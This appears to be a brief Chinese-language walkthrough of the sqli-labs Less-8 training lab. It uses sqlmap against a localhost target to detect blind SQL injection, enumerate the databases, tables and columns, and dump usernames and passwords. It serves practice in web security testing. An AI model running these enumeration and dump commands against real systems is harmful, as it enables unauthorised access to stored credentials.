1.初始状态:
2.检测目标是否有SQL注入漏洞:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1
存在布尔盲注和时间盲注
3.获取当前用户:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 --current-user
4.获取数据库:
当前:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 --current-db
所有:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 --dbs
5.获取当前数据库表名:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 -D security --tables
6.获取users表列名:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 -D security -T users --columns
7.获取用户名及密码:
python3 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-8/?id=1 -D security -T users -C username,password --dump